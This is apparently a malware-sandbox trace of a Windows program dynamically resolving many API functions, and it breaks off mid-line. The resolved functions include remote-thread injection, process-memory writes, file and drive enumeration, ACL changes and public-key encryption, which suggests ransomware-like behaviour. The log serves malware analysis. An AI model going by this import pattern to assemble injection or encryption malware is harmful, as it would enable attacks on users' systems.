[0312.769] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.769] SetErrorMode (uMode=0x0) returned 0x8001 [0312.769] GetProcAddress (hModule=0x759c0000, lpProcName="lstrcmpiA") returned 0x759d3e8e [0312.769] SetErrorMode (uMode=0x8001) returned 0x0 [0312.769] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.769] SetErrorMode (uMode=0x0) returned 0x8001 [0312.769] GetProcAddress (hModule=0x759c0000, lpProcName="IsWow64Process") returned 0x759d195e [0312.769] SetErrorMode (uMode=0x8001) returned 0x0 [0312.769] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.769] SetErrorMode (uMode=0x0) returned 0x8001 [0312.770] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstChangeNotificationW") returned 0x759ed851 [0312.770] SetErrorMode (uMode=0x8001) returned 0x0 [0312.770] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.770] SetErrorMode (uMode=0x0) returned 0x8001 [0312.770] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextChangeNotification") returned 0x759f5c1e [0312.770] SetErrorMode (uMode=0x8001) returned 0x0 [0312.770] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.770] SetErrorMode (uMode=0x0) returned 0x8001 [0312.770] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessInJob") returned 0x759fc7ea [0312.770] SetErrorMode (uMode=0x8001) returned 0x0 [0312.770] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.770] SetErrorMode (uMode=0x0) returned 0x8001 [0312.770] GetProcAddress (hModule=0x759c0000, lpProcName="CreateRemoteThread") returned 0x75a5416b [0312.770] SetErrorMode (uMode=0x8001) returned 0x0 [0312.770] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.770] SetErrorMode (uMode=0x0) returned 0x8001 [0312.770] GetProcAddress (hModule=0x759c0000, lpProcName="CreateNamedPipeW") returned 0x75a5414b [0312.770] SetErrorMode (uMode=0x8001) returned 0x0 [0312.771] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.771] SetErrorMode (uMode=0x0) returned 0x8001 [0312.771] GetProcAddress (hModule=0x759c0000, lpProcName="DisconnectNamedPipe") returned 0x75a541df [0312.771] SetErrorMode (uMode=0x8001) returned 0x0 [0312.771] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.771] SetErrorMode (uMode=0x0) returned 0x8001 [0312.771] GetProcAddress (hModule=0x759c0000, lpProcName="ConnectNamedPipe") returned 0x75a540fb [0312.771] SetErrorMode (uMode=0x8001) returned 0x0 [0312.771] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.771] SetErrorMode (uMode=0x0) returned 0x8001 [0312.771] GetProcAddress (hModule=0x759c0000, lpProcName="GetLogicalDrives") returned 0x759d5371 [0312.771] SetErrorMode (uMode=0x8001) returned 0x0 [0312.771] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.771] SetErrorMode (uMode=0x0) returned 0x8001 [0312.771] GetProcAddress (hModule=0x759c0000, lpProcName="GetDriveTypeW") returned 0x759d418b [0312.772] SetErrorMode (uMode=0x8001) returned 0x0 [0312.772] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.772] SetErrorMode (uMode=0x0) returned 0x8001 [0312.772] GetProcAddress (hModule=0x759c0000, lpProcName="GetUserDefaultUILanguage") returned 0x759d44ab [0312.772] SetErrorMode (uMode=0x8001) returned 0x0 [0312.772] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.772] SetErrorMode (uMode=0x0) returned 0x8001 [0312.772] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileExW") returned 0x759f3b92 [0312.772] SetErrorMode (uMode=0x8001) returned 0x0 [0312.772] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.772] SetErrorMode (uMode=0x0) returned 0x8001 [0312.772] GetProcAddress (hModule=0x759c0000, lpProcName="GetEnvironmentVariableW") returned 0x759d1b48 [0312.772] SetErrorMode (uMode=0x8001) returned 0x0 [0312.772] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.772] SetErrorMode (uMode=0x0) returned 0x8001 [0312.772] GetProcAddress (hModule=0x759c0000, lpProcName="SetFilePointer") returned 0x759d17d1 [0312.772] SetErrorMode (uMode=0x8001) returned 0x0 [0312.772] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.773] SetErrorMode (uMode=0x0) returned 0x8001 [0312.773] GetProcAddress (hModule=0x759c0000, lpProcName="InitializeCriticalSection") returned 0x77ce2c42 [0312.773] SetErrorMode (uMode=0x8001) returned 0x0 [0312.773] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.773] SetErrorMode (uMode=0x0) returned 0x8001 [0312.773] GetProcAddress (hModule=0x759c0000, lpProcName="GetTimeZoneInformation") returned 0x759d465a [0312.773] SetErrorMode (uMode=0x8001) returned 0x0 [0312.773] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.773] SetErrorMode (uMode=0x0) returned 0x8001 [0312.773] GetProcAddress (hModule=0x759c0000, lpProcName="MultiByteToWideChar") returned 0x759d192e [0312.773] SetErrorMode (uMode=0x8001) returned 0x0 [0312.773] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.773] SetErrorMode (uMode=0x0) returned 0x8001 [0312.773] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileAttributesW") returned 0x759ed4f7 [0312.773] SetErrorMode (uMode=0x8001) returned 0x0 [0312.773] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.773] SetErrorMode (uMode=0x0) returned 0x8001 [0312.774] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x759e052f [0312.774] SetErrorMode (uMode=0x8001) returned 0x0 [0312.774] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.774] SetErrorMode (uMode=0x0) returned 0x8001 [0312.774] GetProcAddress (hModule=0x759c0000, lpProcName="OpenProcess") returned 0x759d1986 [0312.774] SetErrorMode (uMode=0x8001) returned 0x0 [0312.774] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.774] SetErrorMode (uMode=0x0) returned 0x8001 [0312.774] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileTime") returned 0x759d4407 [0312.774] SetErrorMode (uMode=0x8001) returned 0x0 [0312.774] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.774] SetErrorMode (uMode=0x0) returned 0x8001 [0312.774] GetProcAddress (hModule=0x759c0000, lpProcName="ReleaseMutex") returned 0x759d111e [0312.774] SetErrorMode (uMode=0x8001) returned 0x0 [0312.774] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.774] SetErrorMode (uMode=0x0) returned 0x8001 [0312.774] GetProcAddress (hModule=0x759c0000, lpProcName="LeaveCriticalSection") returned 0x77cd2270 [0312.774] SetErrorMode (uMode=0x8001) returned 0x0 [0312.775] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.775] SetErrorMode (uMode=0x0) returned 0x8001 [0312.775] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleFileNameW") returned 0x759d4950 [0312.775] SetErrorMode (uMode=0x8001) returned 0x0 [0312.775] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.775] SetErrorMode (uMode=0x0) returned 0x8001 [0312.775] GetProcAddress (hModule=0x759c0000, lpProcName="SetFileTime") returned 0x759eecbb [0312.775] SetErrorMode (uMode=0x8001) returned 0x0 [0312.775] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.775] SetErrorMode (uMode=0x0) returned 0x8001 [0312.775] GetProcAddress (hModule=0x759c0000, lpProcName="RemoveDirectoryW") returned 0x75a544cf [0312.775] SetErrorMode (uMode=0x8001) returned 0x0 [0312.775] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.775] SetErrorMode (uMode=0x0) returned 0x8001 [0312.775] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualAlloc") returned 0x759d1856 [0312.775] SetErrorMode (uMode=0x8001) returned 0x0 [0312.775] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.776] SetErrorMode (uMode=0x0) returned 0x8001 [0312.776] GetProcAddress (hModule=0x759c0000, lpProcName="ExpandEnvironmentStringsW") returned 0x759d4173 [0312.776] SetErrorMode (uMode=0x8001) returned 0x0 [0312.776] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.776] SetErrorMode (uMode=0x0) returned 0x8001 [0312.776] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0312.776] SetErrorMode (uMode=0x8001) returned 0x0 [0312.776] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.776] SetErrorMode (uMode=0x0) returned 0x8001 [0312.776] GetProcAddress (hModule=0x759c0000, lpProcName="FindNextFileW") returned 0x759d54ee [0312.776] SetErrorMode (uMode=0x8001) returned 0x0 [0312.776] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.776] SetErrorMode (uMode=0x0) returned 0x8001 [0312.776] GetProcAddress (hModule=0x759c0000, lpProcName="EnterCriticalSection") returned 0x77cd22b0 [0312.776] SetErrorMode (uMode=0x8001) returned 0x0 [0312.776] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.776] SetErrorMode (uMode=0x0) returned 0x8001 [0312.777] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileAttributesW") returned 0x759d1b18 [0312.777] SetErrorMode (uMode=0x8001) returned 0x0 [0312.777] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.777] SetErrorMode (uMode=0x0) returned 0x8001 [0312.777] GetProcAddress (hModule=0x759c0000, lpProcName="FindClose") returned 0x759d4442 [0312.777] SetErrorMode (uMode=0x8001) returned 0x0 [0312.777] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.777] SetErrorMode (uMode=0x0) returned 0x8001 [0312.777] GetProcAddress (hModule=0x759c0000, lpProcName="OpenEventW") returned 0x759d15d6 [0312.777] SetErrorMode (uMode=0x8001) returned 0x0 [0312.777] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.777] SetErrorMode (uMode=0x0) returned 0x8001 [0312.777] GetProcAddress (hModule=0x759c0000, lpProcName="GetTempPathW") returned 0x759ed4dc [0312.777] SetErrorMode (uMode=0x8001) returned 0x0 [0312.777] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.777] SetErrorMode (uMode=0x0) returned 0x8001 [0312.777] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0312.777] SetErrorMode (uMode=0x8001) returned 0x0 [0312.778] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.778] SetErrorMode (uMode=0x0) returned 0x8001 [0312.778] GetProcAddress (hModule=0x759c0000, lpProcName="HeapFree") returned 0x759d14c9 [0312.778] SetErrorMode (uMode=0x8001) returned 0x0 [0312.778] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.778] SetErrorMode (uMode=0x0) returned 0x8001 [0312.778] GetProcAddress (hModule=0x759c0000, lpProcName="HeapCreate") returned 0x759d4a2d [0312.778] SetErrorMode (uMode=0x8001) returned 0x0 [0312.778] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.778] SetErrorMode (uMode=0x0) returned 0x8001 [0312.778] GetProcAddress (hModule=0x759c0000, lpProcName="WriteProcessMemory") returned 0x759ed9e0 [0312.778] SetErrorMode (uMode=0x8001) returned 0x0 [0312.778] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.778] SetErrorMode (uMode=0x0) returned 0x8001 [0312.778] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSizeEx") returned 0x759d59e2 [0312.778] SetErrorMode (uMode=0x8001) returned 0x0 [0312.778] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.779] SetErrorMode (uMode=0x0) returned 0x8001 [0312.779] GetProcAddress (hModule=0x759c0000, lpProcName="FindFirstFileW") returned 0x759d4435 [0312.779] SetErrorMode (uMode=0x8001) returned 0x0 [0312.779] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.779] SetErrorMode (uMode=0x0) returned 0x8001 [0312.779] GetProcAddress (hModule=0x759c0000, lpProcName="InterlockedExchange") returned 0x759d1462 [0312.779] SetErrorMode (uMode=0x8001) returned 0x0 [0312.779] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.779] SetErrorMode (uMode=0x0) returned 0x8001 [0312.779] GetProcAddress (hModule=0x759c0000, lpProcName="GetVolumeInformationW") returned 0x759ec860 [0312.779] SetErrorMode (uMode=0x8001) returned 0x0 [0312.779] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.779] SetErrorMode (uMode=0x0) returned 0x8001 [0312.779] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0312.779] SetErrorMode (uMode=0x8001) returned 0x0 [0312.779] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.779] SetErrorMode (uMode=0x0) returned 0x8001 [0312.780] GetProcAddress (hModule=0x759c0000, lpProcName="CreateDirectoryW") returned 0x759d4259 [0312.780] SetErrorMode (uMode=0x8001) returned 0x0 [0312.780] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.780] SetErrorMode (uMode=0x0) returned 0x8001 [0312.780] GetProcAddress (hModule=0x759c0000, lpProcName="FreeLibrary") returned 0x759d34c8 [0312.780] SetErrorMode (uMode=0x8001) returned 0x0 [0312.780] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.780] SetErrorMode (uMode=0x0) returned 0x8001 [0312.780] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleW") returned 0x759d34b0 [0312.780] SetErrorMode (uMode=0x8001) returned 0x0 [0312.780] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.780] SetErrorMode (uMode=0x0) returned 0x8001 [0312.780] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcAddress") returned 0x759d1222 [0312.780] SetErrorMode (uMode=0x8001) returned 0x0 [0312.780] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.780] SetErrorMode (uMode=0x0) returned 0x8001 [0312.780] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryW") returned 0x759d492b [0312.780] SetErrorMode (uMode=0x8001) returned 0x0 [0312.781] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.781] SetErrorMode (uMode=0x0) returned 0x8001 [0312.781] GetProcAddress (hModule=0x759c0000, lpProcName="Process32FirstW") returned 0x759f8baf [0312.781] SetErrorMode (uMode=0x8001) returned 0x0 [0312.781] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.781] SetErrorMode (uMode=0x0) returned 0x8001 [0312.781] GetProcAddress (hModule=0x759c0000, lpProcName="Process32NextW") returned 0x759f896c [0312.781] SetErrorMode (uMode=0x8001) returned 0x0 [0312.781] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.781] SetErrorMode (uMode=0x0) returned 0x8001 [0312.781] GetProcAddress (hModule=0x759c0000, lpProcName="GetLastError") returned 0x759d11c0 [0312.781] SetErrorMode (uMode=0x8001) returned 0x0 [0312.781] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.781] SetErrorMode (uMode=0x0) returned 0x8001 [0312.781] GetProcAddress (hModule=0x759c0000, lpProcName="CreateToolhelp32Snapshot") returned 0x759f735f [0312.781] SetErrorMode (uMode=0x8001) returned 0x0 [0312.781] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.781] SetErrorMode (uMode=0x0) returned 0x8001 [0312.782] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileW") returned 0x759d3f5c [0312.782] SetErrorMode (uMode=0x8001) returned 0x0 [0312.782] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.782] SetErrorMode (uMode=0x0) returned 0x8001 [0312.782] GetProcAddress (hModule=0x759c0000, lpProcName="CreateMutexW") returned 0x759d424c [0312.782] SetErrorMode (uMode=0x8001) returned 0x0 [0312.782] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.782] SetErrorMode (uMode=0x0) returned 0x8001 [0312.782] GetProcAddress (hModule=0x759c0000, lpProcName="ResetEvent") returned 0x759d16dd [0312.782] SetErrorMode (uMode=0x8001) returned 0x0 [0312.782] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.782] SetErrorMode (uMode=0x0) returned 0x8001 [0312.782] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0312.782] SetErrorMode (uMode=0x8001) returned 0x0 [0312.782] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.782] SetErrorMode (uMode=0x0) returned 0x8001 [0312.782] GetProcAddress (hModule=0x759c0000, lpProcName="SetEvent") returned 0x759d16c5 [0312.783] SetErrorMode (uMode=0x8001) returned 0x0 [0312.783] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.783] SetErrorMode (uMode=0x0) returned 0x8001 [0312.783] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0312.783] SetErrorMode (uMode=0x8001) returned 0x0 [0312.783] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.783] SetErrorMode (uMode=0x0) returned 0x8001 [0312.783] GetProcAddress (hModule=0x759c0000, lpProcName="CreateEventW") returned 0x759d183e [0312.783] SetErrorMode (uMode=0x8001) returned 0x0 [0312.783] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.783] SetErrorMode (uMode=0x0) returned 0x8001 [0312.783] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForSingleObject") returned 0x759d1136 [0312.783] SetErrorMode (uMode=0x8001) returned 0x0 [0312.783] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.783] SetErrorMode (uMode=0x0) returned 0x8001 [0312.783] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForMultipleObjects") returned 0x759d4220 [0312.783] SetErrorMode (uMode=0x8001) returned 0x0 [0312.783] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.784] SetErrorMode (uMode=0x0) returned 0x8001 [0312.784] GetProcAddress (hModule=0x759c0000, lpProcName="GetTickCount") returned 0x759d110c [0312.784] SetErrorMode (uMode=0x8001) returned 0x0 [0312.784] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0312.784] SetErrorMode (uMode=0x0) returned 0x8001 [0312.784] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFree") returned 0x759d186e [0312.784] SetErrorMode (uMode=0x8001) returned 0x0 [0312.784] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.784] SetErrorMode (uMode=0x0) returned 0x8001 [0312.784] GetProcAddress (hModule=0x758c0000, lpProcName="GetIconInfo") returned 0x758e49ea [0312.784] SetErrorMode (uMode=0x8001) returned 0x0 [0312.784] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.784] SetErrorMode (uMode=0x0) returned 0x8001 [0312.784] GetProcAddress (hModule=0x758c0000, lpProcName="DrawIcon") returned 0x758e8deb [0312.784] SetErrorMode (uMode=0x8001) returned 0x0 [0312.784] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.784] SetErrorMode (uMode=0x0) returned 0x8001 [0312.785] GetProcAddress (hModule=0x758c0000, lpProcName="LoadImageW") returned 0x758dfbd1 [0312.785] SetErrorMode (uMode=0x8001) returned 0x0 [0312.785] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.785] SetErrorMode (uMode=0x0) returned 0x8001 [0312.785] GetProcAddress (hModule=0x758c0000, lpProcName="GetCursorPos") returned 0x758e1218 [0312.785] SetErrorMode (uMode=0x8001) returned 0x0 [0312.785] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.785] SetErrorMode (uMode=0x0) returned 0x8001 [0312.785] GetProcAddress (hModule=0x758c0000, lpProcName="DefWindowProcW") returned 0x77ce25dd [0312.785] SetErrorMode (uMode=0x8001) returned 0x0 [0312.785] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.785] SetErrorMode (uMode=0x0) returned 0x8001 [0312.785] GetProcAddress (hModule=0x758c0000, lpProcName="CreateWindowExW") returned 0x758d8a29 [0312.785] SetErrorMode (uMode=0x8001) returned 0x0 [0312.785] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.785] SetErrorMode (uMode=0x0) returned 0x8001 [0312.785] GetProcAddress (hModule=0x758c0000, lpProcName="UnregisterClassW") returned 0x758d9f84 [0312.785] SetErrorMode (uMode=0x8001) returned 0x0 [0312.786] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.786] SetErrorMode (uMode=0x0) returned 0x8001 [0312.786] GetProcAddress (hModule=0x758c0000, lpProcName="GetKeyboardLayoutList") returned 0x758e2e69 [0312.786] SetErrorMode (uMode=0x8001) returned 0x0 [0312.786] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.786] SetErrorMode (uMode=0x0) returned 0x8001 [0312.786] GetProcAddress (hModule=0x758c0000, lpProcName="CharLowerA") returned 0x758e3e75 [0312.786] SetErrorMode (uMode=0x8001) returned 0x0 [0312.786] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.786] SetErrorMode (uMode=0x0) returned 0x8001 [0312.786] GetProcAddress (hModule=0x758c0000, lpProcName="CharToOemW") returned 0x75931a26 [0312.786] SetErrorMode (uMode=0x8001) returned 0x0 [0312.786] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.786] SetErrorMode (uMode=0x0) returned 0x8001 [0312.786] GetProcAddress (hModule=0x758c0000, lpProcName="TranslateMessage") returned 0x758d7809 [0312.786] SetErrorMode (uMode=0x8001) returned 0x0 [0312.786] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.787] SetErrorMode (uMode=0x0) returned 0x8001 [0312.787] GetProcAddress (hModule=0x758c0000, lpProcName="PeekMessageW") returned 0x758e05ba [0312.787] SetErrorMode (uMode=0x8001) returned 0x0 [0312.787] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.787] SetErrorMode (uMode=0x0) returned 0x8001 [0312.787] GetProcAddress (hModule=0x758c0000, lpProcName="DispatchMessageW") returned 0x758d787b [0312.787] SetErrorMode (uMode=0x8001) returned 0x0 [0312.787] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.787] SetErrorMode (uMode=0x0) returned 0x8001 [0312.787] GetProcAddress (hModule=0x758c0000, lpProcName="MsgWaitForMultipleObjects") returned 0x758e0b4a [0312.787] SetErrorMode (uMode=0x8001) returned 0x0 [0312.787] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.787] SetErrorMode (uMode=0x0) returned 0x8001 [0312.788] GetProcAddress (hModule=0x758c0000, lpProcName="RegisterClassExW") returned 0x758db17d [0312.788] SetErrorMode (uMode=0x8001) returned 0x0 [0312.788] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.788] SetErrorMode (uMode=0x0) returned 0x8001 [0312.788] GetProcAddress (hModule=0x758c0000, lpProcName="SetWindowLongA") returned 0x758e6110 [0312.788] SetErrorMode (uMode=0x8001) returned 0x0 [0312.788] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.788] SetErrorMode (uMode=0x0) returned 0x8001 [0312.788] GetProcAddress (hModule=0x758c0000, lpProcName="GetWindowLongA") returned 0x758dd156 [0312.788] SetErrorMode (uMode=0x8001) returned 0x0 [0312.788] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.788] SetErrorMode (uMode=0x0) returned 0x8001 [0312.788] GetProcAddress (hModule=0x758c0000, lpProcName="CharUpperW") returned 0x758df350 [0312.788] SetErrorMode (uMode=0x8001) returned 0x0 [0312.788] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0312.788] SetErrorMode (uMode=0x0) returned 0x8001 [0312.788] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0312.788] SetErrorMode (uMode=0x8001) returned 0x0 [0312.788] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0312.790] SetErrorMode (uMode=0x0) returned 0x8001 [0312.790] GetProcAddress (hModule=0x76240000, lpProcName="CryptImportPublicKeyInfo") returned 0x76256c0e [0312.790] SetErrorMode (uMode=0x8001) returned 0x0 [0312.790] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0312.790] SetErrorMode (uMode=0x0) returned 0x8001 [0312.790] GetProcAddress (hModule=0x76240000, lpProcName="CryptDecodeObjectEx") returned 0x7624d718 [0312.790] SetErrorMode (uMode=0x8001) returned 0x0 [0312.790] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.790] SetErrorMode (uMode=0x0) returned 0x8001 [0312.790] GetProcAddress (hModule=0x77740000, lpProcName="RegCloseKey") returned 0x7775469d [0312.790] SetErrorMode (uMode=0x8001) returned 0x0 [0312.790] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.791] SetErrorMode (uMode=0x0) returned 0x8001 [0312.791] GetProcAddress (hModule=0x77740000, lpProcName="GetAce") returned 0x777545f0 [0312.791] SetErrorMode (uMode=0x8001) returned 0x0 [0312.791] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.791] SetErrorMode (uMode=0x0) returned 0x8001 [0312.791] GetProcAddress (hModule=0x77740000, lpProcName="CryptEncrypt") returned 0x7776779b [0312.791] SetErrorMode (uMode=0x8001) returned 0x0 [0312.791] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.791] SetErrorMode (uMode=0x0) returned 0x8001 [0312.791] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthorityCount") returned 0x77750e0c [0312.791] SetErrorMode (uMode=0x8001) returned 0x0 [0312.791] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.791] SetErrorMode (uMode=0x0) returned 0x8001 [0312.791] GetProcAddress (hModule=0x77740000, lpProcName="AllocateAndInitializeSid") returned 0x777540e6 [0312.791] SetErrorMode (uMode=0x8001) returned 0x0 [0312.791] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.791] SetErrorMode (uMode=0x0) returned 0x8001 [0312.792] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthority") returned 0x77750e24 [0312.792] SetErrorMode (uMode=0x8001) returned 0x0 [0312.792] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.792] SetErrorMode (uMode=0x0) returned 0x8001 [0312.792] GetProcAddress (hModule=0x77740000, lpProcName="SetEntriesInAclW") returned 0x77752a66 [0312.792] SetErrorMode (uMode=0x8001) returned 0x0 [0312.792] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.792] SetErrorMode (uMode=0x0) returned 0x8001 [0312.792] GetProcAddress (hModule=0x77740000, lpProcName="RegCreateKeyExW") returned 0x777540fe [0312.792] SetErrorMode (uMode=0x8001) returned 0x0 [0312.792] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.792] SetErrorMode (uMode=0x0) returned 0x8001 [0312.792] GetProcAddress (hModule=0x77740000, lpProcName="CryptVerifySignatureW") returned 0x7774c54a [0312.792] SetErrorMode (uMode=0x8001) returned 0x0 [0312.792] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.792] SetErrorMode (uMode=0x0) returned 0x8001 [0312.792] GetProcAddress (hModule=0x77740000, lpProcName="SetNamedSecurityInfoW") returned 0x77749fe2 [0312.793] SetErrorMode (uMode=0x8001) returned 0x0 [0312.793] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.793] SetErrorMode (uMode=0x0) returned 0x8001 [0312.793] GetProcAddress (hModule=0x77740000, lpProcName="GetNamedSecurityInfoW") returned 0x7774f4fd [0312.793] SetErrorMode (uMode=0x8001) returned 0x0 [0312.793] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.793] SetErrorMode (uMode=0x0) returned 0x8001 [0312.793] GetProcAddress (hModule=0x77740000, lpProcName="CryptCreateHash") returned 0x7774df4e [0312.793] SetErrorMode (uMode=0x8001) returned 0x0 [0312.793] LoadLibraryA 